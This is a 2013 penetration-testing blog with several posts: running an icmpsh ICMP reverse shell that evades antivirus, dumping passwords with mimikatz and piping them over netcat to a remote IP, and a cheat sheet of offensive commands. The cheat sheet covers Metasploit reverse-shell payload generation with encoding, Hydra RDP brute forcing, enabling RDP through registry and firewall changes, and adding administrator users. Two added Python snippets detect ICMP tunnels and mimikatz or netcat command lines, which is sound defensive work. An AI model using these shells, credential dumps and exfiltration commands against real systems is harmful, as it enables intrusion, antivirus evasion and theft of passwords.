Saturday 21 December 2013

ICMP Reverse Shell


Every time while penetration testing, we come across scenarios where we need to get a shell on a remote box. The handiest tool is the Metasploit Meterpreter, but most of our smart antiviruses detect it, so we quickly need some way to get around that.

We can try an ICMP reverse shell, which I recently tested on my machine.
Most importantly, it does not require administrator access to the machine; we can just use it on the fly.

I know there are a lot of articles on ICMP shells on the internet, but this is just for quick reference.

Download ICMP Shell from: https://github.com/inquisb/icmpsh

1. Upload "icmpsh.exe" to the victim machine; trust me, the antivirus didn't detect it in my case.
2. Execute "icmpsh.exe -t <Attacker's IP> -d 500 -b 30 -s 128"
3. Start the listener on the attacker machine with "python icmpsh_m.py <Attacker's IP> <Victim's IP>"
4. Or you can use the listener script "./run.sh", which generates the Step 2 command for you and starts the listener.
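
From the defender's side, a shell carried over ICMP shows up as a host that keeps sending echo requests whose payloads are not what any ping tool sends. The following Python script is an added illustration of that check and is not part of the original post or of the icmpsh project; the reference ping payload patterns, the sample source addresses and the sample packets are constructed assumptions.

```python
import struct
from collections import Counter

# Reference ping payloads (assumed patterns, not from the post): Windows ping.exe sends this
# fixed 32-byte string; iputils ping sends an 8-byte timestamp then bytes 0x10, 0x11, 0x12, ...
WINDOWS_PING = b"abcdefghijklmnopqrstuvwabcdefghi"

def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum; evaluates to 0 over a packet whose field is right."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def parse_echo_request(raw: bytes):
    """Payload of a well-formed ICMP echo request (type 8, code 0), else None."""
    if len(raw) < 8 or icmp_checksum(raw) != 0:
        return None
    itype, code, _csum, _ident, _seq = struct.unpack("!BBHHH", raw[:8])
    return raw[8:] if (itype, code) == (8, 0) else None

def looks_like_ping(payload: bytes) -> bool:
    """True when the payload matches one of the reference ping patterns."""
    if payload == WINDOWS_PING:
        return True
    n = len(payload) - 8
    return 0 <= n <= 240 and payload[8:] == bytes(range(0x10, 0x10 + n))

def flag_tunnel_hosts(packets, threshold=3):
    """packets: iterable of (src_ip, raw_icmp_bytes). Returns {src_ip: count} for hosts
    that sent at least `threshold` echo requests carrying payloads no ping tool sends."""
    counts = Counter()
    for src, raw in packets:
        payload = parse_echo_request(raw)
        if payload is not None and not looks_like_ping(payload):
            counts[src] += 1
    return {src: n for src, n in counts.items() if n >= threshold}

def build_echo_request(payload: bytes, ident=1, seq=1) -> bytes:
    """Assemble a valid echo request; used here only to construct the sample traffic."""
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    return header[:2] + struct.pack("!H", icmp_checksum(header + payload)) + header[4:] + payload

# Constructed sample: 10.0.0.5 pings normally; 10.0.0.7 sends echo requests carrying text like command output.
SAMPLE = [("10.0.0.5", build_echo_request(WINDOWS_PING, seq=i)) for i in range(1, 4)]
SAMPLE += [("10.0.0.7", build_echo_request(b" Volume in drive C has no label.\r\n", seq=i))
           for i in range(1, 5)]
```

Pings with custom patterns (ping -p, scanner probes) will also trip the pattern check, so tune the threshold and the reference patterns on your own baseline traffic before alerting on it.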


Figure: Exported Shell through ICMP

Figure: Windows Shell

For more details you can visit:

Hope this is helpful!

Sunday 15 December 2013

Mimikatz Logs and Netcat


Imagine a scenario where you have access to Active Directory or a mail server and are able to run mimikatz on the server (this is a practical scenario). I am damn sure you will get a hell of a lot of passwords out of it, maybe in the thousands. The problem you may face is that the output of mimikatz is so large that you can't copy it even after increasing your command prompt buffer. I decided to look for ways of saving the mimikatz output to a file, and as there is very little info I could find, I decided to write a little article on this.

Mimikatz Author Webpage Here

Log Mimikatz output using the "log" command

Figure: Using the log command

Figure: Generated log file

Log Mimikatz output to a file manually:

Figure: Batch command method

Export the Mimikatz shell to a remote machine through Netcat:

Figure: Exporting the Mimikatz shell

Figure: Mimikatz through Netcat

Export Mimikatz output to a remote console

Figure: Exported Mimikatz output

Figure: Mimikatz output on the remote console

Figure: Exported Mimikatz output in a file on the remote machine

List of Commands Used:

  • mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit
  • mimikatz.exe "privilege::debug" "log sekurlsa::logonpasswords full" exit
  • mimikatz.exe "privilege::debug" "log d:\log.txt sekurlsa::logonpasswords full" exit
  • mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit >> d:\log.txt
  • nc.exe -vv IP 443 -e mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit
  • mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit | nc.exe -vv 192.168.4.15 443
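
The same command list is what a defender wants to recognise in process-creation logs. The Python snippet below is an added example, not part of the original post: it classifies command lines by the mimikatz module::function syntax (which survives renaming the binary), by the credential-reading module, by the output path handed to "log" or a redirect, and by netcat invocations that use -e. The host|user|commandline record format, the host names, the IP 192.0.2.10 and the sample lines are constructed assumptions.

```python
import re

# mimikatz commands use a module::function syntax; this survives renaming mimikatz.exe.
MODULE_CALL = re.compile(r"\b([a-z]+)::([A-Za-z_]+)\b")
CRED_MODULES = {"sekurlsa"}  # module from the post's command list that reads credentials
# a file path given to mimikatz's "log" command or to a shell redirect (assumed drive-letter paths)
OUTPUT_FILE = re.compile(r'(?:\blog\s+|>>?\s*)(?P<path>[A-Za-z]:\\[^\s"]+)', re.IGNORECASE)
# a netcat invocation; "-e" binds a program to the connection
NETCAT = re.compile(r"(?:^|[\\/\s])nc(?:at)?(?:\.exe)?\s+(?P<args>.*)", re.IGNORECASE)

def classify(cmdline: str) -> dict:
    """Findings for one process command line; an empty dict means nothing matched."""
    findings = {}
    calls = MODULE_CALL.findall(cmdline)
    if calls:
        findings["mimikatz_modules"] = sorted({f"{mod}::{fn}" for mod, fn in calls})
        findings["credential_dump"] = any(mod in CRED_MODULES for mod, _ in calls)
    out = OUTPUT_FILE.search(cmdline)
    if out:
        findings["output_file"] = out.group("path")  # artifact to collect during response
    nc = NETCAT.search(cmdline)
    if nc:
        findings["netcat"] = True
        findings["netcat_exec"] = re.search(r"(?:^|\s)-e(?:\s|$)", nc.group("args")) is not None
    return findings

def scan(records):
    """records: constructed 'host|user|commandline' lines. Returns (host, user, findings) per hit."""
    hits = []
    for line in records:
        host, user, cmd = line.split("|", 2)  # maxsplit keeps a shell pipe inside the command intact
        findings = classify(cmd)
        if findings:
            hits.append((host, user, findings))
    return hits

# Constructed process-creation records; hosts, users, IP and paths are placeholders.
SAMPLE_LOG = [
    r'srv01|CORP\alice|mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit',
    r'srv01|CORP\alice|mimikatz.exe "privilege::debug" "log d:\log.txt sekurlsa::logonpasswords full" exit',
    r'srv01|CORP\alice|nc.exe -vv 192.0.2.10 443 -e mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit',
    r'srv01|CORP\alice|cmd.exe /c mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit | nc.exe -vv 192.0.2.10 443',
    r'srv01|CORP\bob|notepad.exe C:\Users\bob\notes.txt',
    r'srv02|CORP\svc|m.exe "sekurlsa::logonpasswords" exit >> d:\out.txt',
]
```

Pair these command-line matches with a network alert on the netcat destination port, since the piped and -e variants leave the credential output on the wire rather than on disk.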

Best Netcat Cheat Sheets from SANS Here

I hope this article will be helpful to all of you!



Thursday 12 December 2013

Linux Privilege Escalation Enumeration Shell Script


I have created a little shell script for Linux privilege escalation enumeration and have uploaded it to GitHub. I am going to add a few more things to the script soon to make it a bit more advanced; I am sure it will help all of us.

Download Scripts:
https://github.com/expl0i13r/privescalation/archive/master.zip
https://github.com/expl0i13r/privescalation/blob/master/privescalation.sh

You can also refer to the script below:

https://github.com/rebootuser/LinEnum

Hope this is helpful; let me know in case it needs modifications, and I will be happy to work on it.

Penetration Testing Necessary Links and Handy Commands


I personally require quick access to a few commands and some links while working on penetration testing exercises, so I decided to post the information below on this blog :)

General Links:

Privilege Escalation Links:

Handy Commands:


Scan all ports at a rate of 10000 packets:

unicornscan X.X.X.X:a -r10000 -v

Python:

python -c 'import pty;pty.spawn("/bin/bash")'
python -m SimpleHTTPServer   (Starting HTTP Server)

Hydra:

hydra  -l admin -P /root/Desktop/passwords -S X.X.X.X rdp   (Self Explanatory)

Mount Remote Windows Share:

smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw

Metasploit Payloads:

msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 X > system.exe
msfpayload php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R > exploit.php
msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R | msfencode -t asp -o file.asp
msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R |  msfencode -e x86/shikata_ga_nai -b "\x00" -t c

Plink Tunnel:

plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 X.X.X.X

Enable RDP Access:

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable 
netsh firewall set service remotedesktop enable


Nmap WebDAV Scanning:

nmap -p80,8080 --script=http-iis-webdav-vuln

Meterpreter:

run getgui -u admin -p 1234
run vnc -p 5043

Add User Windows:

net user test 1234 /add
net localgroup administrators test /add

Mimikatz:

privilege::debug
sekurlsa::logonPasswords full

Compiling Windows Exploits on Backtrack:

cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe

Nasm Command:

nasm -f bin -o payload.bin payload.asm


To be continued...

Hope it's helpful to all of you!